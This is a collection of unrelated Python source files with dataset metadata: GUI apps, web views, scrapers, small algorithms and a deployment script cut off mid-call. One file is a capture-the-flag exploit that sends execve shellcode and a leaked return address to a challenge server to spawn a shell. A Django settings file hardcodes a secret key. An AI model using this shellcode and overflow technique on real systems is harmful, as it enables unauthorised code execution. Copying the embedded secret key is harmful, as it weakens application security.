value=0, text=\"Full Day\")\n opt_full_day.grid(row=1, column=0, padx=2)\n\n opt_half_day = ttk.Radiobutton(Options, width=20, variable=half_day, value=1, text=\"Half Day\")\n opt_half_day.grid(row=1, column=1, padx=2)\n\n btn_submit = Button(Buttons, width=15, font=('Arial', 20), text=\"Submit\",command=lambda: RequestLeave(half_day, cmb_date_picker.currenttext(), txt_comments.get(\"1.0\", END)))\n btn_submit.grid(row=0, column=0, padx=2)\n\n\ndef RequestLeave(half_day, date, com):\n cursor = conn.execute(\"SELECT ManagerID from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n ManID = row[0]\n cursor = conn.execute(\"SELECT RequestID FROM Request ORDER BY RequestID DESC LIMIT 1\")\n for row in cursor:\n RequestID = row[0]\n RequestID = RequestID + 1\n # sql = \"\"\" INSERT INTO Request (?, ?, ?, ?, ?, ?, ?, ?) 
VALUES (%s, %s, %s, %s, %s, %s, %s) \"\"\"\n # val = (RequestID, emp_no, ManID, half_day, date, 'N', com)\n cursor.execute(\"INSERT INTO Request VALUES (?, ?, ?, ?, ?, ?, ?, ?)\", (RequestID, emp_no, ManID, half_day, date, 'N', com, \"\"))\n conn.commit()\n\n\ndef RequestViewerForm():\n fraListBox = Frame(requestviewerform, width=300, height=500, relief=\"raise\")\n fraListBox.pack(side=LEFT, anchor=NW)\n\n fraInfo = Frame(requestviewerform, width=450, height=500, relief=\"raise\")\n fraInfo.pack(side=RIGHT, anchor=NE)\n\n fraInfo.grid_rowconfigure(0, weight=1)\n fraInfo.grid_columnconfigure(0, weight=1)\n\n fraInfo.grid_rowconfigure(0, weight=1)\n fraInfo.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(fraInfo, justify=LEFT, anchor=W, width=120, font=('Arial', 18),\n text=\"Details for request # \" + str(\n request_id) + \" submitted on \" + submission_date + \"\\n\\n\" + \"Leave Date: \" + leave_date + \"\\nLeave Type: \" + leave_type + \"\\nYour Comments: \\n\" + emp_comment)\n lbl_title.grid(row=0, column=0, columnspan=4)\n\n lbl_mgr_detail = Label(fraInfo, justify=LEFT, anchor=W, width=120, font=('Arial', 18),\n text=\"\\nSigned off: \" + signed_off + \"\\nManager's Comment:\\n''\" + mgr_comment + \"''\\nManager: \" + mgr_name)\n lbl_mgr_detail.grid(row=1, column=0, columnspan=4)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(fraInfo, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=5, column=3)\n\n lst_leave_req = ttk.Treeview(fraListBox, columns=viewer_listbox_headers, show=\"headings\", height=26)\n lst_leave_req.pack(side=TOP)\n\n lst_leave_req.heading('#1', text='RequestID', anchor=CENTER)\n lst_leave_req.heading('#2', text='Date', anchor=CENTER)\n lst_leave_req.heading('#3', text='Signed Off', anchor=CENTER)\n\n lst_leave_req.column('#1', stretch=YES, minwidth=50, width=100)\n lst_leave_req.column('#2', stretch=YES, minwidth=50, width=100)\n lst_leave_req.column('#3', stretch=YES, minwidth=50, width=100)\n\n cursor = conn.execute(\"SELECT RequestID, LeaveDate, SignedOff from Request Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n print(row[0])\n lst_leave_req.insert('', 'end', values=((\"1\"), (row[1]), (row[2])))\n\n ttk.Scrollbar(orient=\"vertical\", command=lst_leave_req.yview)\n\n btn_amend = Button(fraInfo, width=15, font=('Arial', 18), text=\"Amend Request\", command=amend_request)\n btn_amend.grid(row=3, column=1, rowspan=8)\n\n btn_revoke = Button(fraInfo, width=15, font=('Arial', 18), text=\"Revoke Request\", command=revoke_request)\n btn_revoke.grid(row=3, column=2, rowspan=8)\n\n\n# ---- Initialization ----\n\n\nglobal emp_no\nemp_no = input(\"Please enter EmpID\")\nManager = \"Not found\"\ncursor = conn.execute(\"SELECT Manager from Employee Where EmployeeID = ?\", (emp_no,))\nfor row in cursor:\n Manager = row[0]\n\n# Get Job role to know which form to load\nif Manager == \"Y\":\n # load Manager Form\n print(\"Opening Manager Form\")\n cursor = conn.execute(\"SELECT Name, Days_Of_Leave, RolloverDays from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n user_name = row[0]\n num_days = row[1]\n Rollover = row[2]\n\n days_expiring_soon = (num_days - Rollover) # NOT SURE HOW\n\n ShowManagerDashboardForm()\n managerdashboardform.mainloop()\nelif Manager == \"N\":\n # load Employee Form\n print(\"Opening Employee Form\")\n\n cursor = conn.execute(\"SELECT Name, Days_Of_Leave, RolloverDays from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n user_name = row[0]\n num_days 
= row[1]\n Rollover = row[2]\n\n days_expiring_soon = (num_days - Rollover) # NOT SURE HOW\n\n ShowEmployeeDashboardForm()\n employeedashboardform.mainloop()\nelif Manager == \"Not found\":\n # not found\n print(\"Not found\")\n","sub_path":"LeaveSystem.py","file_name":"LeaveSystem.py","file_ext":"py","file_size_in_byte":20633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205668782","text":"#!/usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n\r\nfrom string import digits\r\n\r\ninputfile = 'A-large.in'\r\noutputfile = 'large-output.op'\r\n\r\ndef solve(data):\r\n d = list(digits)\r\n dx = str(data)\r\n x=1\r\n while(len(d)>0):\r\n dx = str(data*x)\r\n for i in dx:\r\n if i in d: d.remove(i)\r\n x+=1\r\n return dx\r\n\r\n\r\nif __name__ == '__main__':\r\n inputdata = open(inputfile, 'rb').readlines()\r\n cases = int(inputdata[0])\r\n inputdata.pop(0)\r\n with open(outputfile, 'wb') as out:\r\n for case in range(cases):\r\n n = inputdata[0].strip()\r\n if n=='0': result = 'INSOMNIA'\r\n else: result = solve(int(n))\r\n sol = 'Case #%d: %s\\n' %(case+1, str(result))\r\n out.write(sol)\r\n inputdata = inputdata[1:]","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_tux_tux_counting-sheep.py","file_name":"16_0_1_tux_tux_counting-sheep.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25132751","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nLocal settings for traffic project.\n\"\"\"\n__author__ = \"Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)\"\n\nfrom base import *\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '$zga6v8+n2xzo9(yf)896=x9=g%$s4c^uf4q)ajv&z#k^d!!o9'\n\nALLOWED_HOSTS = ['*']\n","sub_path":"traffic/traffic/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178795624","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtSerialPort import *\n\n\nclass Scanner(QObject):\n finished = pyqtSignal()\n newPort = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.stopped = False\n\n def doScan(self):\n for portInfo in QSerialPortInfo.availablePorts():\n if portInfo.isValid() and not portInfo.isBusy():\n if self.isPayloadValid(portInfo):\n print(portInfo.portName())\n self.newPort.emit(portInfo.portName())\n QThread.msleep(10)\n self.finished.emit()\n\n def isPayloadValid(self, info):\n serial = QSerialPort(info)\n serial.setBaudRate(QSerialPort.Baud9600)\n if serial.open(QSerialPort.ReadOnly):\n while serial.waitForReadyRead(100):\n QThread.currentThread().msleep(10)\n if bytearray(serial.read(1)).decode() == \"*\":\n return True\n return False\n\n\nclass Listener(QObject):\n def __init__(self, portName, parent=None):\n QObject.__init__(self, parent)\n self.serial = QSerialPort(portName)\n self.serial.setBaudRate(QSerialPort.Baud9600)\n self.serial.readyRead.connect(self.onReadyRead)\n self.serial.error.connect(self.handleError)\n\n def onReadyRead(self):\n print(\"read\", self.serial.readAll())\n\n def handleError(self, error):\n print(\"error\", error)\n\n def start(self):\n 
print(self.serial.open(QSerialPort.ReadWrite))\n\n\nclass Manager(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.scanner = Scanner(self)\n self.thread = QThread(self)\n self.thread.started.connect(self.scanner.doScan)\n self.scanner.finished.connect(self.thread.quit)\n # self.scanner.finished.connect(self.thread.deleteLater)\n self.thread.finished.connect(self.scanner.deleteLater)\n self.scanner.newPort.connect(self.onNewPort)\n self.thread.start()\n self.listeners = []\n\n def onNewPort(self, portName):\n listener = Listener(portName, self)\n listener.start()\n\n\nif __name__ == '__main__':\n import sys\n\n app = QCoreApplication(sys.argv)\n thread = Manager()\n sys.exit(app.exec_())\n","sub_path":"temp/46852457.py","file_name":"46852457.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559840387","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\ncontext.log_level = 'debug'\n\ndef get_shellcode():\n # Reference: https://www.exploit-db.com/exploits/41883\n sc = b\"\"\n sc += b\"\\x48\\x31\\xff\\x48\\x31\\xf6\\x48\\x31\\xd2\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\xb0\\x3b\\x0f\\x05\"\n return sc\n\ndef generate_payload(stack_addr):\n sc = get_shellcode()\n\n payload = b\"\"\n payload += sc\n payload += b\"A\"*(40 - len(sc))\n payload += p64(stack_addr) # rip \n return payload\n\ndef main():\n #target = process(\"./shellme64\")\n target = remote(\"chal.tuctf.com\", 30507)\n\n target.recvuntil(\"Hey! I think you dropped this\\n\")\n\n leaked_stack_addr = int(target.recvline().rstrip().decode(\"utf-8\"), 16)\n print(leaked_stack_addr)\n print(type(leaked_stack_addr))\n\n prompt = target.recvuntil(b\"> \")\n\n payload = generate_payload(leaked_stack_addr)\n print(payload)\n target.sendline(payload)\n\n target.interactive()\n\nmain()\n","sub_path":"2019/tuctf19/pwn/shellme64/shellme64.py","file_name":"shellme64.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51107005","text":"from flask import Blueprint, abort, request, flash, redirect, url_for, \\\n render_template\nfrom flask_login import current_user\nfrom flask_babel import _ # gettext\n\nfrom app import db\nfrom app.models import CommitteeRevision, Page, Group, User, \\\n NavigationEntry, PagePermission\nfrom app.utils import ModuleAPI, NavigationAPI\nfrom app.forms import CommitteeForm\nfrom app.utils.forms import flash_form_errors\nimport app.utils.committee as CommitteeAPI\n\nblueprint = Blueprint('committee', __name__)\n\n\n@blueprint.route('/commissie/', methods=['GET'])\ndef list():\n revisions = CommitteeAPI.get_alphabetical()\n return render_template('committee/list.htm', revisions=revisions)\n\n\n@blueprint.route('/edit/commissie/', methods=['GET', 'POST'])\ndef edit_committee(committee=''):\n if not ModuleAPI.can_write('committee'):\n return abort(403)\n\n path = 'commissie/' + committee\n\n page = Page.get_by_path(path)\n\n form = request.form\n if page:\n revision = page.get_latest_revision()\n form = CommitteeForm(form, revision)\n else:\n revision = None\n form = CommitteeForm()\n\n try:\n url_group_id = int(request.args.get('group_id', None))\n except:\n url_group_id = None\n\n form.group_id.choices = [(group.id, group.name) for group in\n Group.query.order_by(Group.name).all()]\n\n if len(request.form) == 0:\n if revision:\n 
selected_group_id = revision.group_id\n elif url_group_id is not None:\n selected_group_id = url_group_id\n else:\n selected_group_id = form.group_id.choices[0][0]\n else:\n selected_group_id = int(form.group_id.data)\n\n form.group_id.data = selected_group_id\n\n selected_group = Group.query.get(selected_group_id)\n form.coordinator_id.choices = [\n (user.id, user.name) for user in\n selected_group.users.order_by(User.first_name, User.last_name).all()]\n\n form.nl_title.data = selected_group.name\n\n if form.validate_on_submit():\n committee_nl_title = form.nl_title.data.strip()\n committee_en_title = form.en_title.data.strip()\n\n if not page:\n root_entry_url = url_for('committee.list').rstrip('/')\n root_entry = NavigationEntry.query\\\n .filter(NavigationEntry.url == root_entry_url)\\\n .first()\n\n # Check whether the root navigation entry exists.\n if not root_entry:\n last_root_entry = NavigationEntry.query\\\n .filter(NavigationEntry.parent_id == None)\\\n .order_by(NavigationEntry.position.desc()).first() # noqa\n\n root_entry_position = 1\n if last_root_entry:\n root_entry_position = last_root_entry.position + 1\n\n root_entry = NavigationEntry(\n None, 'Commissies', 'Committees', root_entry_url, False,\n False, root_entry_position)\n\n db.session.add(root_entry)\n db.session.commit()\n\n page = Page(path, 'committee')\n\n # Never needs paid.\n page.needs_paid = False\n\n # Create a navigation entry for the new committee.\n last_navigation_entry = NavigationEntry.query\\\n .filter(NavigationEntry.parent_id == root_entry.id)\\\n .first()\n\n entry_position = 1\n if last_navigation_entry:\n entry_position = last_navigation_entry.position + 1\n\n navigation_entry = NavigationEntry(\n root_entry, committee_nl_title, committee_en_title, '/' + path,\n False, False, entry_position)\n\n db.session.add(navigation_entry)\n db.session.commit()\n\n # Sort these navigation entries.\n NavigationAPI.alphabeticalize(root_entry)\n\n # Assign the navigation entry to the new page (committee).\n page.navigation_entry_id = navigation_entry.id\n\n db.session.add(page)\n db.session.commit()\n\n # Assign read rights to all, and edit rights to BC.\n all_group = Group.query.filter(Group.name == 'all').first()\n bc_group = Group.query.filter(Group.name == 'BC').first()\n\n all_entry = PagePermission(all_group.id, page.id, 1)\n bc_entry = PagePermission(bc_group.id, page.id, 2)\n\n db.session.add(all_entry)\n db.session.add(bc_entry)\n db.session.commit()\n else:\n # If the committee's title has changed, the navigation needs to be\n # updated. 
Look for the entry, compare the titles, and change where\n # necessary.\n entry = NavigationEntry.query\\\n .filter(NavigationEntry.url == '/' + path).first()\n if entry.title != committee_nl_title:\n entry.title = committee_nl_title\n db.session.add(entry)\n db.session.commit()\n\n group_id = int(form.group_id.data)\n coordinator_id = int(form.coordinator_id.data)\n\n # Add coordinator to BC\n bc_group = Group.query.filter(Group.name == \"BC\").first()\n if bc_group is not None:\n new_coordinator = User.query.filter(\n User.id == coordinator_id).first()\n bc_group.add_user(new_coordinator)\n\n new_revision = CommitteeRevision(\n page, committee_nl_title, committee_en_title,\n form.comment.data.strip(), current_user.id,\n form.nl_description.data.strip(), form.en_description.data.strip(),\n group_id, coordinator_id, form.interim.data)\n\n db.session.add(new_revision)\n db.session.commit()\n\n flash(_('The committee has been saved.'), 'success')\n\n return redirect(url_for('page.get_page', path=path))\n else:\n flash_form_errors(form)\n\n return render_template('committee/edit.htm', page=page,\n form=form, path=path)\n","sub_path":"app/views/committee.py","file_name":"committee.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426211183","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\nN=14\ntol = -8\nexact_energy = np.load(\"./pxp,0th_order,e,\"+str(N)+\".npy\")\nexact_overlap = np.load(\"./pxp,0th_order,LW_overlap,\"+str(N)+\".npy\")\nfsa_energy = np.load(\"./pxp,LW_fsa,0th_order,e,\"+str(N)+\".npy\")\nfsa_overlap = np.load(\"./pxp,LW_fsa,0th_order,LW_overlap,\"+str(N)+\".npy\")\nto_del=[]\nfor n in range(0,np.size(exact_overlap,axis=0)):\n if exact_overlap[n] < tol:\n to_del = np.append(to_del,n)\nfor n in range(np.size(to_del,axis=0)-1,-1,-1):\n exact_overlap=np.delete(exact_overlap,to_del[n])\n exact_energy=np.delete(exact_energy,to_del[n])\n \nplt.scatter(exact_energy,exact_overlap)\nplt.scatter(fsa_energy,fsa_overlap,marker=\"x\",color=\"red\",s=100)\nplt.xlabel(r\"$E$\")\nplt.ylabel(r\"$\\log(\\vert \\langle E \\vert H^z, LW \\rangle \\vert^2)$\")\nplt.show()\n\nexact_energy = np.load(\"./pxp,1st_order,e,\"+str(N)+\".npy\")\nexact_overlap = np.load(\"./pxp,1st_order,LW_overlap,\"+str(N)+\".npy\")\nfsa_energy = np.load(\"./pxp,LW_fsa,1st_order,e,\"+str(N)+\".npy\")\nfsa_overlap = np.load(\"./pxp,LW_fsa,1st_order,LW_overlap,\"+str(N)+\".npy\")\nto_del=[]\nfor n in range(0,np.size(exact_overlap,axis=0)):\n if exact_overlap[n] a')\n return [i.get('href') for i in items]\n\n\ndef get_archive_name(volume, index: int = None):\n return 'vol_{:0>3}'.format(index)\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n volume_id = re.search('/chapter/[^/]+/(\\d+)', volume)\n params = [\n 'device%5Fid=3',\n # 'page={}',\n 'manga%5Fid={}'.format(volume_id.groups()[0]),\n 'loadermax=1',\n ]\n\n uri = '{}/manga/get_manga_url?'.format(domainUri)\n uri += '&'.join(params)\n\n n = 0\n _img_index = 0\n while n < 199:\n\n _img_index += 1\n content = get('{}&page={}'.format(uri, n)).encode()\n\n parser = 
document_fromstring(content).cssselect('ImageLoader')\n\n if not len(parser):\n break\n\n t = MultiThreads()\n\n for i in parser:\n img_url = i.get('url')\n if img_url.find('blankpage.jpg') > 0:\n break\n # see manga.py:280\n t.addThread(download_one_file, (img_url,))\n # safe_downloader(img_url, path.join(temp_root_path, 'img_{:0>3}.jpg'.format(_img_index)))\n t.startAll()\n\n n += 2\n\n return [-1]\n\n \"\"\"\n curl 'https://www.viz.com/manga/get_manga_url?device%5Fid=3&page=16&manga%5Fid=6098&loadermax=1' -H 'x-requested-with: ShockwaveFlash/27.0.0.130' -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/47.0.2631.55' -H 'authority: www.viz.com' -H 'referer: https://www.viz.com/shonenjump/chapter/claymore-chapter-7/6098?read=1' --compressed\n \"\"\"\n\n\ndef get_manga_name(url, get=None):\n name = re.search('\\\\.com/shonenjump/chapters/([^/]+)', url)\n if not name:\n return UrlParseError()\n return name.groups()[0]\n \"\"\"\n :param url: str\n :param get: request.get\n :return: str\n \"\"\"\n pass\n\n\ndownload_one_file = lambda x: x\n","sub_path":"providers/viz_com.py","file_name":"viz_com.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96444006","text":"'''a=10\r\nb=20\r\nc=a*b\r\nMul = \"the mulitple of {0} and {1} is {2}\".format(10,34,10*34)\r\nprint(Mul)\r\n'''\r\n'''s1=input(\"Enter first string:\")\r\ns2=input(\"Enter Second string:\") \r\nif s1==s2:\r\n print(\"Both strings are equal\") \r\nelif s1 str:\n\t\tregion = config.get_region()\n\t\tbase = \"https://%s.api.riotgames.com\" % region\n\t\treturn base + url\n\n\tdef set_query(self, query_name: str, queries: Union[str, Iterable]) -> 'RiotURL':\n\t\tnew_queries = []\n\t\tif type(queries) is str:\n\t\t\tnew_queries = [queries]\n\t\tfor query in queries:\n\t\t\tnew_queries.append(str(query))\n\t\tself.queries[query_name] = new_queries\n\t\treturn self\n\n\tdef get_url_with_query(self) -> str:\n\t\tfinal_url = self.url\n\t\tfirst = True\n\t\tfor query_name in self.queries.keys():\n\t\t\tif first:\n\t\t\t\tfinal_url += '?'\n\t\t\t\tfirst = False\n\t\t\telse:\n\t\t\t\tfinal_url += '&'\n\t\t\tfinal_url += \"%s=%s\" % (query_name, ','.join(self.queries[query_name]))\n\t\treturn final_url\n\n\tdef request(self, max_retry: int = 5) -> Union[None, Dict]:\n\t\tself.set_query('api_key', config.get_key())\n\t\turl = self.get_url_with_query()\n\n\t\twhile max_retry > 0:\n\t\t\tr = requests.get(url)\n\n\t\t\tif r.status_code == 200:\n\t\t\t\treturn r.json()\n\t\t\telif r.status_code == 404:\n\t\t\t\tlogging.warning(\"Data not found: %s\" % url)\n\t\t\t\treturn None\n\t\t\telif r.status_code == 429:\n\t\t\t\tbackoff = r.headers.get('Retry-After')\n\t\t\t\tif backoff is None:\n\t\t\t\t\tlogging.warning(\"Code 429 with no Retry-After.\")\n\t\t\t\t\tlogging.warning(r.headers)\n\t\t\t\t\tbackoff = 30\n\t\t\t\tbackoff = int(backoff)\n\t\t\t\tlogging.info(\"Backoff for %d seconds.\" % backoff)\n\t\t\t\ttime.sleep(backoff)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tlogging.error(url)\n\t\t\t\tlogging.error(r.json().get('status'))\n\n\t\t\t\tif r.status_code == 401:\n\t\t\t\t\tlogging.error(\"API token is not included.\")\n\t\t\t\t\traise NotReachableError\n\t\t\t\telif r.status_code == 403:\n\t\t\t\t\tlogging.error(\"API token or URL is not valid.\")\n\t\t\t\t\traise KeyNotValidError\n\t\t\t\telse:\n\t\t\t\t\tlogging.error(\"Unknown error of code %d. 
Retrying.\" % r.status_code)\n\t\t\t\t\tmax_retry -= 1\n\t\t\t\t\tcontinue\n\n\t\treturn None\n","sub_path":"api/riot_api.py","file_name":"riot_api.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198601579","text":"'''\n Merge Sort\n'''\ndef merge_sort(unsorted_list):\n if len(unsorted_list) <= 1:\n return unsorted_list\n\n middle = len(unsorted_list) // 2\n leftlist = unsorted_list[:middle]\n rightlist = unsorted_list[middle:]\n\n leftlist = merge_sort(leftlist)\n rightlist = merge_sort(rightlist)\n return list(merge(leftlist,rightlist))\n\n\ndef merge(left_half,right_half):\n res = []\n while len(left_half) != 0 and len(right_half) != 0:\n if left_half[0] < right_half[0]:\n res.append(left_half[0])\n left_half.remove(left_half[0])\n else:\n res.append(right_half[0])\n right_half.remove(right_half[0])\n\n if len(left_half) == 0:\n res = res + right_half\n else:\n res = res + left_half\n return res\n\n\nlist1 = [5,2,15,8,65]\nlist1 = merge_sort(list1)\nprint(list1)","sub_path":"collegeExercise/SortingPrograms/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246127822","text":"import pandas\nimport turtle\nimport unidecode\n\nscreen = turtle.Screen()\nscreen.title(\"Lietuvos miestų žaidimas\")\nscreen.setup(width=0.99, height=0.99, startx=0, starty=0)\n\ncanvas = screen.getcanvas()\nroot = canvas.winfo_toplevel()\nroot.overrideredirect(1)\n\nimage = \"100 days of code//day 25//lietuvos miestai//lietuvos-žemėlapis-vektorius.gif\"\n\nscreen.addshape(image)\nturtle.shape(image)\n\ndata = pandas.read_csv(\"100 days of code//day 25//lietuvos miestai//50_lietuvos_miestu_pagal_populiacija.csv\")\nall_cities = data.city.to_list()\n# print(data[\"y\"])\n# print(all_cities)\nguessed_cities = []\n\nwhile len(guessed_cities) < 50:\n # def get_mouse_click_coor(x, y):\n # print(x, y)\n\n # turtle.onscreenclick(get_mouse_click_coor)\n\n # turtle.mainloop()\n\n answer_city = screen.textinput(title = f\"{len(guessed_cities)}/50 miestų su didžiausia populiacija\", \n prompt = \"Norint išeiti įveskite 'Baigiau'. 
Miesto pavadinimas:\").title()\n unidecode.unidecode(answer_city)\n if answer_city == \"Baigiau\":\n cities_left = []\n for city in all_cities:\n if city not in guessed_cities:\n cities_left.append(city)\n df = pandas.DataFrame(cities_left, columns = ['city'])\n df.to_csv(\"100 days of code//day 25//lietuvos miestai//likę_miestai.csv\")\n break\n if answer_city in all_cities and answer_city not in guessed_cities:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n city_data = data[data.city == answer_city]\n print(city_data.x)\n t.goto(int(city_data.x), int(city_data.y))\n t.color(\"black\")\n t.write(answer_city, font = ('Arial', 12, 'normal', 'bold'))\n\n guessed_cities.append(answer_city)\n \n \n\n# If guessed all\nif len(guessed_cities) == 50:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n t.color(\"red\")\n t.goto(-150, 250)\n t.write(\"Atspėjote visus\", font = ('Arial', 48, 'normal', 'bold'))\n \n # screen.mainloop()\n# xcor = data[\"x\"]\n# xc = xcor.to_string(index = False)\n\n# ycor = data[\"y\"]\n# yc = ycor.to_string(index = False)\n\n# print(\"Yes\")\n# turtle.penup()\n# turtle.goto(xc, yc)\n# turtle.write(answer_city, align = \"center\")\n\n# screen.exitonclick()","sub_path":"100 days of code/day 25/lietuvos miestai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334387496","text":"# -*- coding: utf-8 -*-\r\n#\r\n# AUTHOR = PAUL KEARNEY \r\n# STUDENT ID = G00364787\r\n# DATE = 2018-03-02\r\n# EXERCISE05\r\n# A script to...\r\n# Write a Python script that reads the Iris data set in and prints the four numerical \r\n# values on each row in a nice format. That is, on the screen should be printed the \r\n# petal length, petal width, sepal length and sepal width, and these values should \r\n# have the decimal places aligned, with a space between the columns.\r\n# \r\n# all own work and with help from references\r\n#\r\n# references used:\r\n# https://docs.python.org/2/library/csv.html\r\n# accessed: 2-mar-2018\r\n#\r\n# https://pythonprogramming.net/reading-csv-files-python-3/\r\n# accessed: 2 mar 2018\r\n# \r\n# https://stackoverflow.com/questions/8234445/python-format-output-string-right-alignment\r\n# accessed: 2 mar 2018\r\n#\r\n# http://www.tutorialspoint.com/python/string_rjust.htm\r\n# accessed: 2 mar 2018\r\n#\r\n# http://www.tutorialspoint.com/python/string_rjust.htm\r\n# accessed: 2 mar 2018\r\n#\r\nimport csv\r\n#\r\n# setup the required data for the progam to run\r\nfilename = \"iris.csv\"\r\ndelim = \",\"\r\nindex = 0;\r\n\r\nfield = \"\"\r\n\r\nprint(\"# Program is running...\")\r\nwith open(filename) as csvfile:\r\n print(\"# Opening: \",filename)\r\n readCSV = csv.reader(csvfile, delimiter=delim)\r\n for field in readCSV:\r\n if (len(field) >0 ):\r\n # build up the ouptut string before printing to screen.\r\n opStr = field[0].rjust(3,\" \") + \" \" + field[1].rjust(3,\" \")\r\n opStr = opStr + \" \" + field[2].rjust(3,\" \") + \" \" + field[3].rjust(3,\" \")\r\n print( opStr )\r\n print(\"# End of file\")\r\nprint(\"# Program is finished.\")\r\n\r\n","sub_path":"gmit--exercise05--reading-csv-file--code--20180303a.py","file_name":"gmit--exercise05--reading-csv-file--code--20180303a.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541909792","text":"from fabric.contrib.files import exists, sed\nfrom fabric.api import env, local, 
prefix, run\n\n\nclass Deployment(object):\n\n # project settings\n PROJECT_NAME = 'sales_rank_spider'\n\n PRODUCTION_USER = 'salesranktable'\n STAGING_USER = 'cfc'\n\n # static settings\n BASE_HOST_STRING = '%s@ssh.pythonanywhere.com'\n BASE_REPO_URL = 'git@github.com:cfc603/%s'\n\n def __init__(self, live):\n self.live = live\n self.set_env_user()\n self.set_env_host_string()\n self.deploy()\n\n def deploy(self):\n self.create_project_folder()\n self.create_source_folder()\n self.get_latest_source()\n self.set_host_settings()\n self.update_virtualenv()\n\n @property\n def host_string(self):\n if not hasattr(self, '_host_string'):\n self._host_string = self.BASE_HOST_STRING % (self.user)\n return self._host_string\n\n @property\n def live(self):\n return self._live\n\n @live.setter\n def live(self, value):\n if value == 'True':\n self._live = True\n elif value == 'False':\n self._live = False\n else:\n raise AttributeError('True or False was not given.')\n\n @property\n def project_folder(self):\n if not hasattr(self, '_project_folder'):\n self._project_folder = '/home/%s/spiders/%s' % (\n self.user, self.PROJECT_NAME\n )\n return self._project_folder\n\n @property\n def repo_url(self):\n if not hasattr(self, '_repo_url'):\n self._repo_url = self.BASE_REPO_URL % (self.PROJECT_NAME)\n return self._repo_url\n\n @property\n def source_folder(self):\n if not hasattr(self, '_source_folder'):\n self._source_folder = '%s/source' % (self.project_folder)\n return self._source_folder\n\n @property\n def user(self):\n if not hasattr(self, '_user'):\n if self.live:\n self._user = self.PRODUCTION_USER\n else:\n self._user = self.STAGING_USER\n return self._user\n\n @property\n def virtualenv_folder(self):\n if not hasattr(self, '_virtualenv_folder'):\n self._virtualenv_folder = '/home/%s/.virtualenvs/%s' % (\n self.user, self.PROJECT_NAME\n )\n return self._virtualenv_folder\n\n def create_project_folder(self):\n if not exists(self.project_folder):\n run('mkdir -p %s' % (self.project_folder))\n\n def create_source_folder(self):\n if not exists(self.source_folder):\n run('mkdir -p %s' % (self.source_folder))\n\n def get_latest_source(self):\n if exists('%s/.git' % (self.source_folder)):\n run('cd %s && git fetch' % (self.source_folder,))\n else:\n run('git clone %s %s' % (self.repo_url, self.source_folder))\n\n current_commit = local(\"git log -n 1 --format=%H\", capture=True)\n run('cd %s && git reset --hard %s' % (\n self.source_folder, current_commit\n ))\n\n def set_env_host_string(self):\n env.host_string = self.host_string\n\n def set_env_user(self):\n env.user = self.user\n\n def set_host_settings(self):\n scrapy_cfg_path = '%s/scrapy.cfg' % (self.source_folder)\n\n if self.live:\n setting_location = 'default = sales_rank_spider.settings.production'\n else:\n setting_location = 'default = sales_rank_spider.settings.staging'\n\n sed(\n 